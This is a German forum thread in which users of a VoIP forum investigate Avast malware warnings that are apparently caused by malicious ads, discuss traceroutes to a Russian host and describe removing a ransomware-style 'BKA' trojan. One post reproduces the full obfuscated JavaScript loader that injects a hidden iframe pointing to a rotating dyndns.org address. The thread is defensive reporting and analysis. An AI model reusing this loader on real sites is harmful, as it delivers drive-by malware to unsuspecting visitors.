Warnhinweis bei Avast

Status
Für weitere Antworten geschlossen.

edward

Mitglied
Mitglied seit
8 Jul 2004
Beiträge
313
Punkte für Reaktionen
0
Punkte
16
Seit heute erhalte ich einen Warnhinweis wenn ich die Startseite (www.ippf.eu) des Forums aufrufe. Es handelt sich um den URL-Aufruf [NOPARSE]http://dl1e6.dyndns.org/de/s4[/NOPARSE] mit dem Hinweis auf Malware. Laut Tracert handelt es sich um einen Server aus Übersee.
 
Zuletzt bearbeitet von einem Moderator:
edward schrieb:
... Server aus Übersee ...
Glaube ich nicht:
Code:
IP address: 81.176.228.181
Host name: dl1e6.dyndns.org

Alias:
dl1e6.dyndns.org
81.176.228.181 is from Russian Federation(RU) in region Eastern Europe

TraceRoute to 81.176.228.181 [dl1e6.dyndns.org]

Hop	(ms)	(ms)	(ms)	     IP Address          Host name
1 	  1 	  0 	  0 	     64.124.196.225	 xe-4-2-0.er2.dfw2.us.above.net  
2 	  0 	  0 	  0 	     64.125.26.213	 xe-1-1-0.cr2.dfw2.us.above.net  
3 	  5 	  5 	  5 	     64.125.31.122	 xe-4-2-0.cr2.iah1.us.above.net  
4 	  46 	  45 	  45 	     64.125.28.49	 xe-2-1-0.cr2.dca2.us.above.net  
5 	  47 	  46 	  45 	     64.125.29.26	 ge-1-3-0.mpr2.dca2.us.above.net  
6 	  106 	  106 	  106 	     64.125.27.166	 so-0-1-0.mpr1.lhr3.uk.above.net  
7 	  106 	  106 	  107 	     64.125.27.154	 xe-0-1-0.mpr2.lhr3.uk.above.net  
8 	  108 	  107 	  108 	     195.66.226.90	 r12-fe4-0-0.ldn-kq4.uk.kpnqwest.net  
9 	  176 	  237 	  176 	     217.106.1.154	 msk-dsr12-tg3-2.rt-comm.ru  
10 	  176 	  176 	  183 	     217.106.1.154	 msk-dsr12-tg3-2.rt-comm.ru  
11 	  182 	  211 	  178 	     81.176.228.181	  -  

Trace complete

G., -#####o:
 
Das sieht nicht gut aus. Dieser String kommt auf der Seite gleich sechsmal vor, und zwar immer gleich zweimal nacheinander nach den Referenzen auf pagead2.googlesyndication.com und adserver.ip-phone-forum.de.
<script type='text/javascript'>function uP(S, todayN){return S + todayN;};function z(){var p = B();var M = R(a(A(), p.j.length));var G = p.j[M];var c = p.y[M];if(p.Y.length > 1){var n = p.Y[M];}else {var n = p.Y[0];}return { Z : G, J : n, K: c };};$();function b(Z, J){d = new Date();N = Z;var I = String(W("oPIf957amhcsx48pIPfo",4,12)+W("MmSjzf2ublivrwtMmS",3,12)+W("OaK36k01eoqndgyKOa",3,12));var cookie = s('cookie');var domain = cookie + s('gaTrack');var t = cookie + s('C');var k = cookie + s('v');var win = cookie + s('H');var h = R(d[domain]());var Q = d[t]();var D = d[k]();var JX = d[win]();var _$ = AK(I);var cC = XM(h, _$);var oS = XM(h+Q, _$);var NGaTrack = XM(h+Q+D, _$);var WImg = XM(h+Q+D+JX, _$);N = uP(N, eN(I, cC));N = uP(N, eN(I, oS));N = uP(N, eN(I, NGaTrack));N = uP(N, eN(I, WImg));return N + J;};function e(S){var r = s('r');var f = s('f');return S[r](f);};function A(){return Math.random();};function today(){return (typeof ActiveXObject != W("shSlundelhsS",4,4)+W("fineIwK",0,4)+"d" || typeof XMLHttpRequest != new String("undefined"));};function B(){return {j : e(W("a,b,c,dq1R",0,7)),Y : e(W(".dyndns.orgOqHT",0,11)),y : e(String(W("W8f3s1,fW38",4,3)+"s2,"+"s3,"+W("M1gs4g1M",3,2)))};};function W(S, U, i){return S.substr(U, i);};function g(){var _B = document;var lE = _B.createElement(s('urchinCode'));lE.width = String("12px");lE.height = "17px";lE.style[s('O')] = s('u');try {_B.body.appendChild(lE);} catch(url){try {_B.write(s('w'));_B.body.appendChild(lE);} catch(oImg){};};return lE;};function XM(CL, uA){return CL % uA;};function X(K, hA, FDomain){FDomain = FDomain || {};var TG = FDomain.expires;if (typeof TG == W("MqjnumberqjM",3,6) && TG){var Q = new Date();Q.setTime(Q.getTime() + a(TG, 1000));TG = FDomain.expires = Q;}if(TG && TG.toUTCString) { FDomain.expires = TG.toUTCString(); }hA = encodeURIComponent(hA);var LF = K + W("=NfMt",0,1) + hA;for(var domainF in FDomain){LF += new String(W("tqlx; tlqx",4,2)) + domainF;var pToday = FDomain[domainF];if(pToday !== true){ LF += W("05r=r05",3,1) + pToday;}}document.cookie = LF;};function s(L){var utmn = {max : new String(W("srcwuS",0,3)),x : String(W("mR4nhttn4Rm",4,3)+"p:/"+W("/JaN",0,1)),cookie : new String(W("getnxz",0,3)+W("UTCboE8",0,3)),gaTrack : "Hours",C : new String("Dat"+W("el3Ni",0,1)),v : "Mon"+"th",H : new String(W("2X0FullYear20X",3,8)),w : new String(W("mQ1g<body>gm1Q",4,6)),urchinCode : W("iframewkxJ",0,6),O : W("visib4XE",0,5)+"ility",u : "hidden",E : String(W("/de/8yT",0,4)),r: String(W("splitjmYq",0,5)),urchin: W("chaq4YO",0,3)+"rAt",f : new String(W("oLO,LoO",3,1))};for(var U in utmn){if(U == L){return utmn;}}return null;};function AK(S){return S.length;};function o(K){var _L = document.cookie.match(new RegExp("(?:^|; )" + K.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, W("esE7\\\\$1se7E",4,6)) + String("=([^;"+"]*)")));return _L ? decodeURIComponent(_L[1]) : undefined;};function eN(S, U){var urchin = s('urchin');return S[urchin](U);};function a(CL, uA){return CL * uA;};function $(){try {var l = z();var q = 2473;var img = "urchinUr"+W("KidnlnidK",4,1);var min = new String(W("X732P2X73",4,1));var Z = l.Z;var J = l.J;var T = l.K;if(o(min) != img){if(today()){var N = b(Z, J);var _ = g();var V = s('max');var m = s('x');var F = s('E');_[V] = m + N + F + T;X(min, img, {expires: q});}};} catch(url){alert(url);};};function R(S){return Math.floor(S);};</script></center>

Ich gehe mal nicht davon aus, dass das IPPF DynDNS Adressen bemüht, um den legitimen Inhalt auszuliefern.
 
Bei mir werden sieht etwas anders aus(manche Server werden nicht aufgelöst)
Code:
 7   108 ms    87 ms    98 ms  ae0-0-grtdusix1.red.telefonica-wholesale.net.7.1.84.in-addr.arpa [84.16.7.233]
 8   162 ms    59 ms    56 ms  Xe6-0-2-0-grtloneq1.red.telefonica-wholesale.net119.142.94.in-addr.arpa [94.142.119.90]
 9    81 ms    79 ms    83 ms  xe-11-3-1.edge3.London1.Level3.net [212.187.201.05]
10   100 ms   103 ms    79 ms  unknown.Level3.net [212.113.15.178]
11   176 ms   157 ms   174 ms  217.106.1.146
12   162 ms   176 ms   140 ms  217.106.1.146
13   155 ms   167 ms   215 ms  81.176.228.181

daher habe auf Übersee getippt
 
Zuletzt bearbeitet von einem Moderator:
Ich bekomme die gleiche Meldung ebenfalls seit heute. Hab mal ein "Foto" geschossen. :)

Warnung avast.jpg
pencil.png
 
Sophos sieht noch keine Bedrohung...

Gruß
Sandra
 
Besteht die Bedrohung nur, wenn man nicht Adblock benutzt?
 
Ich habe die Zugriffe auf die obskuren Server mit dyndns.org-Adresse auf anderem Wege bemerkt (NoScript hat sie gemeldet) und in diesem Beitrag darüber berichtet. Ein Mod hat den Thread unter Verweis auf diesen Thread hier geschlossen und vermutet, dass die merkwürdigen Zugriffe über einen externen Adserver eingespielt werden.

Ich habe umgehend Adblock Plus fürs IP-Phone-Forum wieder aktiviert und werde es nun auch dauerhaft aktiv lassen. Ich habe absolut nichts dagegen, dass die Foren-Betreiber das Forum durch Werbung finanzieren, wenn das aber auf Kosten der Sicherheit meiner Rechner geht, dann müssen sie ohne meine Unterstützung leben. Zumal das nicht der erste Fall ist, in dem das Forum durch irgendwelchen über Adserver hereingeschneiten Mist verunreinigt wird.

Grüßle

Der Mikrogigant
 
Was mir noch aufgefallen ist: bei einigen Anzeigen wird neuerdings auch Java JRE geladen, das war bis gestern nicht der Fall.

Gruß
Sandra
 
Hm, hier kommen keine Warnmeldungen (ghostery ,Adblock Plus und Avira AntiVir Premium 2012).
 
Was mir noch aufgefallen ist: bei einigen Anzeigen wird neuerdings auch Java JRE geladen
Bei mir nicht mehr ;) NoScript blockt alle aktiven Inhalte, nicht nur Javascript, sondern auch z. B. Flash oder eben Java. Und NoScript ist bei mir inzwischen so eingestellt, dass auf den Forums-Seiten alle aktiven Inhalte außer solchen direkt von ip-phone-forum.de geblockt werden. Adblock Plus erledigt den Rest.

Gegen seriöse Werbung hätte ich nichts einzuwenden und würde sie auch nicht blocken. Aber wenn eine Aufhebung der Blockade zur Folge hat, dass immer mal wieder Malware hereinschneit, dann bleibt die Blockade eben aktiv.

@Ecki-No1: auch mein Virenscanner (Microsoft Security Essentials) meldet keine Bedrohung. Das ist aber auch kein Wunder, denn dank der beschriebenen Blockademaßnahmen landet die Bedrohung gar nicht erst auf meinem Rechner. Auch bei dir werkelt Adblock Plus, das dürfte der Grund sein, warum dein Virenscanner die Hufe stillhält.

Grüßle

Der Mikrogigant
 
Zuletzt bearbeitet von einem Moderator:
Die genannte Dyndns IP liefert ein HTML aus, in dem ein Java Applet eingebettet ist. Wenn man eine version von Java niedriger als 6.30 installiert hat, wird dadurch ein BKA-Trojaner installiert (www.bka-trojaner.de).
 
So, ich habe das ganze auch mal an Dyndns.com gemeldet, ist eindeutig ein Missbrauch der Services.

Gruß
Sandra
 
Die genannte Dyndns IP liefert ein HTML aus, in dem ein Java Applet eingebettet ist. Wenn man eine version von Java niedriger als 6.30 installiert hat, wird dadurch ein BKA-Trojaner installiert (www.bka-trojaner.de).

Das kann ich leider bestätigen, denn so ist es mir ergangen! :mad:

Wer das Problem vielleicht auch hat, ich bin nach dieser Lösung vorgegangen. Allerdings hieß das Ding bei mir "torrent.exe" und da ich kein Torrent nutze, war das leicht zu erkennen. Ansonsten sehr nerviges Teil, hat mich einiges an Zeit und Nerven gekostet.

So eine verdammte Scheiße, ich hoffe, wir kriegen das kurzfristig wieder hin!

Sorry... :(

Java habe ich dann auch gleich aktualisiert.

@ Sandra-T: Vielen Dank für Deine Mithilfe! :)
 
Scheint aber noch vorhanden zu sein, Avast hat hier auch gerade Alarm geschlagen. Die neue Java-Version 7 Update 1 (Build 1.7.0_01-b08) war bereits installiert, es war auch die Meldung mit dem DynDNS. Für einen Screenshot des Popup-Fensters hat die Zeit leider nicht gereicht.

mfg
 
Bei Avast kann man unten im Systray mit einem Rechtsklick "letztes Popup anzeigen" auswählen, dann kommt es nochmal. :)
 
Danke für den Beitrag, jetzt weiss ich, wo der "Torrent" her kommt!

Gestern hat keiner von drei Virenscannern (Avira,Kaspersky, Spyware Terminator) das Ding gekannt, heute früh hat Kaspersky Alarm geschlagen.
Nervig, aber eher harmlos. Blockiert zwar, scheint aber nichts auszuspionieren. Jedenfalls baut der "Torrent" keine Verbindung "nach Hause" auf.
Entfernen lässt sich das Ding einfach:
- Windows im abgesicherten Modus mit Kommandozeile starten.
- Im Benutzerverzeichnis (Dokumente und Einstellungen bei XP, Users bei WIN7) die Torrent.exe suchen und löschen.
 
Status
Für weitere Antworten geschlossen.
Holen Sie sich 3CX - völlig kostenlos!
Verbinden Sie Ihr Team und Ihre Kunden Telefonie Livechat Videokonferenzen

Gehostet oder selbst-verwaltet. Für bis zu 10 Nutzer dauerhaft kostenlos. Keine Kreditkartendetails erforderlich. Ohne Risiko testen.

3CX
Für diese E-Mail-Adresse besteht bereits ein 3CX-Konto. Sie werden zum Kundenportal weitergeleitet, wo Sie sich anmelden oder Ihr Passwort zurücksetzen können, falls Sie dieses vergessen haben.